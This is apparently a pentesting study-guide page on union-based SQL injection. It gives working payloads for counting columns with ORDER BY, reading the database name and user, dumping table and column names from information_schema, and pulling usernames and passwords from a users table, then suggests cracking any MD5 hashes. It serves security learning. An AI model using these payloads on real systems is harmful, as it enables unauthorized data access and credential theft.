Union Based SQLi

For UNION SQLi attacks to work, we first need to satisfy two conditions:

The injected UNION query has to include the same number of columns as the original query.
The data types need to be compatible with each column.

Determining the Number of Columns

Ways to detect the number of columns can be found in the below link.

One of the payloads:

' ORDER BY 1-- //

increase the value until you receive an error.

Displaying value

If you get an error, you can cast a value in the supported column type value.

# Suppose we have determined that there are 5 columns available.
' union select null, database(), user(), null, null -- //

# Only Select Query commands are working.
# Example of value casting
UNION SELECT null, CAST(database() AS CHAR), user(), null, null -- // 
# Note: Different database has different ways to cast a value.

We can get the table-related information of the database using the below way:

' union select null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() -- //

Now we can create a specific SQLi command to see the database's data.

' union select null, username, password, null, null from offsec.users -- //

# ' union select null, username[From Column name], password[From Column name], null, null from offsec[from table_schema].users[From table_name] -- //

Suppose you get MD5 Hashes then you can crack it.

PreviousAuthentication Bypass NextBlind SQL Injections

Last updated 11 months ago